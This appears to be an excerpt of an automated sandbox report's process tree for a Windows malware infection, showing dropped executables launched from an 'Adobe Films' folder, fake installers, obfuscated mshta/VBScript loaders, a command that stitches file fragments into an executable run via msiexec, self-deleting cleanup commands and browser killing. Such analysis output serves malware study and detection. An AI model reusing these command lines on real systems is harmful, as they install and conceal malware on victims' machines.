                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-6EL87.tmp\setup.tmp" /SL5="$503E2,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                            7⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:6708
                                                                                                                                                            • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                              "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5808
                                                                                                                                                                • C:\defd6a87b0dc4c8ffe88a8a6bae86a\Setup.exe
                                                                                                                                                                  C:\defd6a87b0dc4c8ffe88a8a6bae86a\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  PID:4664
                                                                                                                                                              • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                                "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                                8⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:6172
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9AB1G.tmp\postback.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9AB1G.tmp\postback.exe" ss1
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:7020
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst2.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:6348
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\askinstall60.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7016
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4464
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:6936
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:7120
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ligr-game.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1688
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\customer7.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\customer7.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2676
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:6520
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 856
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7076
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 840
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6704
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 840
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5004
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 1196
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5612
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sfx.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sfx.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2952
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:1436
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:7136
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6684
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:6088
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                PID:8328
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffeefc8dec0,0x7ffeefc8ded0,0x7ffeefc8dee0
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:8688
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2284 /prefetch:1
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:9008
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2232 /prefetch:1
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:9000
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=1960 /prefetch:8
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:8992
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=1948 /prefetch:8
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:8984
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:2
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:8976
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=3112 /prefetch:8
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:8008
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3212 /prefetch:2
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:8436
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=3636 /prefetch:8
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:8704
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=1636 /prefetch:8
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:7624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=396 /prefetch:8
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:7272
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1864,3855972649479010933,2601104576234823982,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8328_592805499" --mojo-platform-channel-handle=848 /prefetch:8
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:6348
                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe
                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4348
                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4268
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\DTGFEUn_o1M9RSUAbNV8hXQC.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5148
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                      8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:6664
                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6908
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:6984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:5428
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:2240
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:7156
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                          msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:420
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill -im "DTGFEUn_o1M9RSUAbNV8hXQC.exe" -F
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:2308
                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\KxH_iRnYA0jUmH7tx4JuupZC.exe
                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\KxH_iRnYA0jUmH7tx4JuupZC.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                PID:4336
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im KxH_iRnYA0jUmH7tx4JuupZC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\KxH_iRnYA0jUmH7tx4JuupZC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4164
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im KxH_iRnYA0jUmH7tx4JuupZC.exe /f
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:4424
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:6640
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\4db1uJMqN9iUYcI51x4AoUqZ.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\4db1uJMqN9iUYcI51x4AoUqZ.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5100
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-OIHR6.tmp\4db1uJMqN9iUYcI51x4AoUqZ.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-OIHR6.tmp\4db1uJMqN9iUYcI51x4AoUqZ.tmp" /SL5="$30200,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4db1uJMqN9iUYcI51x4AoUqZ.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    PID:4300
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AMO8N.tmp\DYbALA.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AMO8N.tmp\DYbALA.exe" /S /UID=2710
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                      PID:4768
                                                                                                                                                                                                                      • C:\Program Files\Java\UCUWBRHDIW\foldershare.exe
                                                                                                                                                                                                                        "C:\Program Files\Java\UCUWBRHDIW\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:3780
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3c-c5fbc-905-7bf9e-3aa76cd66ee51\Tabynexowo.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\3c-c5fbc-905-7bf9e-3aa76cd66ee51\Tabynexowo.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:5652
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                              dw20.exe -x -s 2008
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:8016
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\57-d0753-781-e7ebd-9e3e4195be6f4\Fuceligaewu.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\57-d0753-781-e7ebd-9e3e4195be6f4\Fuceligaewu.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:6316
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vetdvvsh.yiy\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:5392
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vetdvvsh.yiy\GcleanerEU.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\vetdvvsh.yiy\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:7780
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zwe5iiyk.2zt\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      PID:6404
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zwe5iiyk.2zt\installer.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\zwe5iiyk.2zt\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:7900
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ekhdtw1.20g\any.exe & exit
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1ekhdtw1.20g\any.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1ekhdtw1.20g\any.exe
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:7872
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgtdmzd1.30r\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:7316
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jgtdmzd1.30r\gcleaner.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jgtdmzd1.30r\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:8172
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qboe4pek.msz\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:7436
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qboe4pek.msz\autosubplayer.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\qboe4pek.msz\autosubplayer.exe /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:7244
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:4384
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:4384
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:6856
